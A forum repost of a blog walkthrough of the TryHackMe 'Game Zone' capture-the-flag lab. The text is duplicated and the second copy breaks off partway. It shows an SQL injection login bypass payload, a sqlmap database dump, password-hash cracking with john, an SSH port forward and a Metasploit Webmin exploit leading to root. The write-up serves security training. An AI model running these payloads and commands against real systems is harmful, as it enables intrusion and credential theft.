01-20-2023, 08:33 PM
TryHackMe – Game Zone Walkthrough
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1071170","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-game-zone-walkthrough/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F9VbXoi9heZM%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/gamezone" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/gamezone</a></li>
<li><strong>Difficulty</strong>: Easy</li>
<li><strong>Target</strong>: user and root flags on a Linux server</li>
<li><strong>Highlights</strong>: leveraging port forwarding to expose a webservice from behind a firewall, using <code>sqlmap</code> to find a username and hashed password</li>
<li><strong>Tools used</strong>: <code>sqlmap</code>, <code>nmap</code>, <code>dirb</code>, <code>burpsuite</code>, <code>hydra</code>, <code>john the ripper</code>, <code>metasploit</code></li>
<li><strong>Tags</strong>: <em>sqli, hashcracking, metasploit, ssh tunnel</em></li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="372" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png" alt="" class="wp-image-1071175" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png 1024w, https://blog.finxter.com/wp-content/uplo...00x109.png 300w, https://blog.finxter.com/wp-content/uplo...68x279.png 768w, https://blog.finxter.com/wp-content/uplo...ge-206.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png" alt="" class="wp-image-1071207" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-215.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!</p>
<h2>IPs</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.163.79
export myIP=10.6.2.23</pre>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png" alt="" class="wp-image-1071212" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-216.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Let’s kick things off with our standard <code>nmap</code> and <code>dirb</code> scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.</p>
<p>To find the character’s name on the main page, we can do a reverse image search on google. I’ve played this title before but forgot his name, so I just googled “<em>hitman game character name</em>” to find the answer to our first question. (agent 47)</p>
<h2>NMAP SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="653" height="535" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png" alt="" class="wp-image-1071177" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png 653w, https://blog.finxter.com/wp-content/uplo...00x246.png 300w" sizes="(max-width: 653px) 100vw, 653px" /></figure>
</div>
<h2>DIRB SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="479" height="654" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png" alt="" class="wp-image-1071178" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png 479w, https://blog.finxter.com/wp-content/uplo...20x300.png 220w" sizes="(max-width: 479px) 100vw, 479px" /></figure>
</div>
<h2>WALK THE WEBSITE</h2>
<p>We see a login portal on the landing page of our target IP. We also look at the <code>/images</code> folder that <code>dirb</code> found, but nothing remarkable is there at first glance.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="489" height="543" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png" alt="" class="wp-image-1071179" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png 489w, https://blog.finxter.com/wp-content/uplo...70x300.png 270w" sizes="(max-width: 489px) 100vw, 489px" /></figure>
</div>
<p>Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">' or 1=1 -- -</pre>
<p>The login trick works, and we are presented with a search box.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="484" height="156" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png" alt="" class="wp-image-1071180" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png 484w, https://blog.finxter.com/wp-content/uplo...300x97.png 300w" sizes="(max-width: 484px) 100vw, 484px" /></figure>
</div>
<h2>INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png" alt="" class="wp-image-1071217" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png 469w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure>
</div>
<p>Let’s fire up <code>burpsuite</code> now to intercept an HTTP-post request made with this search box.</p>
<p>Intercepted HTTP-post request:</p>
<pre class="wp-block-preformatted"><code>POST /portal.php HTTP/1.1
Host: 10.10.134.32
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.134.32
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.134.32/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5
Connection: close searchitem=hitman</code>
</pre>
<p>We’ll save this request in a file titled <code>req</code>. </p>
<p>If you use <code>burpsuite</code> to capture the request, you can directly download it as a file. A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the <code>sqlmap</code> command. </p>
<h2>USING SQLMAP TO EXTRACT THE FULL DATABASE </h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png" alt="" class="wp-image-1071214" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-217.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>With the following command, we can instruct <code>sqlmap</code> to attempt to download (dump) the entire database and search for login username and hashed password.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sqlmap -r req --dbms=mysql --dump --level 5</pre>
<p>It worked! We see that the database stores a list of game titles and reviews. </p>
<p>The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="948" height="427" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png" alt="" class="wp-image-1071185" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png 948w, https://blog.finxter.com/wp-content/uplo...00x135.png 300w, https://blog.finxter.com/wp-content/uplo...68x346.png 768w" sizes="(max-width: 948px) 100vw, 948px" /></figure>
</div>
<p>We can see that it is probably a SHA256 encrypted string. Now it’s time to …</p>
<h2>CRACK THAT HASH WITH JOHN (THE RIPPER)!</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png" alt="" class="wp-image-1071220" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-219.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john hash.txt --wordlist=/home/kalisurfer/hacking-tools/rockyou.txt --format=Raw-SHA256</pre>
<p><code>rockyou.txt</code> is a legendary leaked database of passwords (14,344,391 passwords!)</p>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA256 [SHA256 512/512 AVX512BW 16x])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
videogamer124 (?)
1g 0:00:00:00 DONE (2023-01-14 12:23) 1.449g/s 4369Kp/s 4369Kc/s 4369KC/s vimivera..tyler912
Use the "--show --format=Raw-SHA256" options to display all of the cracked passwords reliably
Session completed</code>
</pre>
</p>
<h2>SSH INTO THE BOX AND GRAB THE USER FLAG</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]</pre>
<p>We are in!</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ cat user.txt
64—---digits omitted—--------5c
</pre>
<h2>PRIVILEGE ESCALATION</h2>
<p>This box requires a two-step process of port forwarding via ssh and then throwing a reverse meterpreter shell to a listener. </p>
<p>Let’s check for hidden services running on ports that may be behind a firewall. We can use the ss utility to check out all of the data connections from each port on our target machine.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">agent47@gamezone:~$ ss -t -u -l -p -n</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Netid State Recv-Q Send-Q Local Address
ort Peer Addressort
udp UNCONN 0 0 *:10000 *:*</code></pre>
<p>This first line is curious. It appears that a service is running on port 10000 of the target system. </p>
<p>Let’s go ahead and port forward to see what is lying behind the firewall. Port 10000 is typically used for server tools and configuration services.</p>
<h2>SET UP PORT FORWARD WITH SSH</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png" alt="" class="wp-image-1071221" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-220.png 469w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure>
</div>
<p>The following command will activate port forwarding via ssh:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh -L 10000:localhost:10000 [email protected]
password: —-cracked-password—-
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 109 packages can be updated.
68 updates are security updates. Last login: Sat Jan 14 18:21:17 2023 from 10.6.2.23
agent47@gamezone:~$
</pre>
<p>We are connected now with port forwarding in place. Let’s navigate in our browser to <code>http://$targetIP:10000</code></p>
<p>After logging in with the same <code>username:password</code> combination we used with <code>ssh</code>, we are given access to a webmin portal.</p>
<h2>PRIVESC WITH METASPLOIT</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png" alt="" class="wp-image-1071223" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-221-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x511.png 768w, https://blog.finxter.com/wp-content/uplo...ge-221.png 1056w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Searching for <code>webmin</code> in Metasploit brings up the following Metasploit module.</p>
<p>Let’s use it and set it up with the following options:</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="863" height="608" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png" alt="" class="wp-image-1071190" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-212.png 863w, https://blog.finxter.com/wp-content/uplo...00x211.png 300w, https://blog.finxter.com/wp-content/uplo...68x541.png 768w" sizes="(max-width: 863px) 100vw, 863px" /></figure>
</div>
<p>Let it rip! </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">run</pre>
<p>And it connects us to a shell. We can use the following command to interact with the meterpreter on session 0.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sessions -i 0</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="383" height="349" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png" alt="" class="wp-image-1071191" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-213.png 383w, https://blog.finxter.com/wp-content/uplo...00x273.png 300w" sizes="(max-width: 383px) 100vw, 383px" /></figure>
</div>
<p>And we now have our root flag! Thanks for reading this write-up.</p>
</div>
https://www.sickgaming.net/blog/2023/01/...lkthrough/
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1071170","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-game-zone-walkthrough/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2F9VbXoi9heZM%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/gamezone" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/gamezone</a></li>
<li><strong>Difficulty</strong>: Easy</li>
<li><strong>Target</strong>: user and root flags on a Linux server</li>
<li><strong>Highlights</strong>: leveraging port forwarding to expose a webservice from behind a firewall, using <code>sqlmap</code> to find a username and hashed password</li>
<li><strong>Tools used</strong>: <code>sqlmap</code>, <code>nmap</code>, <code>dirb</code>, <code>burpsuite</code>, <code>hydra</code>, <code>john the ripper</code>, <code>metasploit</code></li>
<li><strong>Tags</strong>: <em>sqli, hashcracking, metasploit, ssh tunnel</em></li>
</ul>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="372" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png" alt="" class="wp-image-1071175" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-206-1024x372.png 1024w, https://blog.finxter.com/wp-content/uplo...00x109.png 300w, https://blog.finxter.com/wp-content/uplo...68x279.png 768w, https://blog.finxter.com/wp-content/uplo...ge-206.png 1344w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png" alt="" class="wp-image-1071207" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-215-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-215.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>In this Linux capture-the-flag (CTF) challenge we are tasked with hacking into a game review website’s server and finding a way to gain root privileges. Let’s go!</p>
<h2>IPs</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.163.79
export myIP=10.6.2.23</pre>
<h2>ENUMERATION/RECON</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png" alt="" class="wp-image-1071212" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-216-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-216.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>Let’s kick things off with our standard <code>nmap</code> and <code>dirb</code> scans. We’ll let these run while we go ahead and walk the website looking for interesting leads.</p>
<p>To find the character’s name on the main page, we can do a reverse image search on google. I’ve played this title before but forgot his name, so I just googled “<em>hitman game character name</em>” to find the answer to our first question. (agent 47)</p>
<h2>NMAP SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="653" height="535" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png" alt="" class="wp-image-1071177" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-207.png 653w, https://blog.finxter.com/wp-content/uplo...00x246.png 300w" sizes="(max-width: 653px) 100vw, 653px" /></figure>
</div>
<h2>DIRB SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="479" height="654" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png" alt="" class="wp-image-1071178" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-208.png 479w, https://blog.finxter.com/wp-content/uplo...20x300.png 220w" sizes="(max-width: 479px) 100vw, 479px" /></figure>
</div>
<h2>WALK THE WEBSITE</h2>
<p>We see a login portal on the landing page of our target IP. We also look at the <code>/images</code> folder that <code>dirb</code> found, but nothing remarkable is there at first glance.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="489" height="543" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png" alt="" class="wp-image-1071179" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-209.png 489w, https://blog.finxter.com/wp-content/uplo...70x300.png 270w" sizes="(max-width: 489px) 100vw, 489px" /></figure>
</div>
<p>Due to a lack of proper data sanitization, we discover that the login can be bypassed by entering the following username and leaving the password blank:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">' or 1=1 -- -</pre>
<p>The login trick works, and we are presented with a search box.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="484" height="156" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png" alt="" class="wp-image-1071180" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-210.png 484w, https://blog.finxter.com/wp-content/uplo...300x97.png 300w" sizes="(max-width: 484px) 100vw, 484px" /></figure>
</div>
<h2>INITIAL FOOTHOLD – INTERCEPT A POST REQUEST WITH BURP</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="469" height="703" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png" alt="" class="wp-image-1071217" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-218.png 469w, https://blog.finxter.com/wp-content/uplo...00x300.png 200w" sizes="(max-width: 469px) 100vw, 469px" /></figure>
</div>
<p>Let’s fire up <code>burpsuite</code> now to intercept an HTTP-post request made with this search box.</p>
<p>Intercepted HTTP-post request:</p>
<pre class="wp-block-preformatted"><code>POST /portal.php HTTP/1.1
Host: 10.10.134.32
Content-Length: 17
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.134.32
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://10.10.134.32/portal.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=v82et4dbp2fsr264tqhipmr1k5
Connection: close searchitem=hitman</code>
</pre>
<p>We’ll save this request in a file titled <code>req</code>. </p>
<p>If you use <code>burpsuite</code> to capture the request, you can directly download it as a file. A word of caution: Using Firefox developer mode to intercept and save the request saved it double-spaced for some reason, and I suspect the formatting caused it to screw up the <code>sqlmap</code> command. </p>
<h2>USING SQLMAP TO EXTRACT THE FULL DATABASE </h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="684" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png" alt="" class="wp-image-1071214" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-217-1024x684.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x513.png 768w, https://blog.finxter.com/wp-content/uplo...ge-217.png 1053w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
<p>With the following command, we can instruct <code>sqlmap</code> to attempt to download (dump) the entire database and search for login username and hashed password.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sqlmap -r req --dbms=mysql --dump --level 5</pre>
<p>It worked! We see that the database stores a list of game titles and reviews. </p>
<p>The most interesting piece of information here is the password. It looks like a hashed password. We can use an online hash identifier program like hashes.com to find out the hash type.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">+------------------------------------------------------------------+----------+
| pwd | username |
+------------------------------------------------------------------+----------+
| ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 | agent47 |
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="948" height="427" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png" alt="" class="wp-image-1071185" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-211.png 948w, https://blog.finxter.com/wp-content/uplo...00x135.png 300w, https://blog.finxter.com/wp-content/uplo...68x346.png 768w" sizes="(max-width: 948px) 100vw, 948px" /></figure>
</div>
<p>We can see that it is probably a SHA256 encrypted string. Now it’s time to …</p>
<h2>CRACK THAT HASH WITH JOHN (THE RIPPER)!</h2>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img decoding="async" loading="lazy" width="1024" height="682" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png" alt="" class="wp-image-1071220" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-219-1024x682.png 1024w, https://blog.finxter.com/wp-content/uplo...00x200.png 300w, https://blog.finxter.com/wp-content/uplo...68x512.png 768w, https://blog.finxter.com/wp-content/uplo...ge-219.png 1055w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>
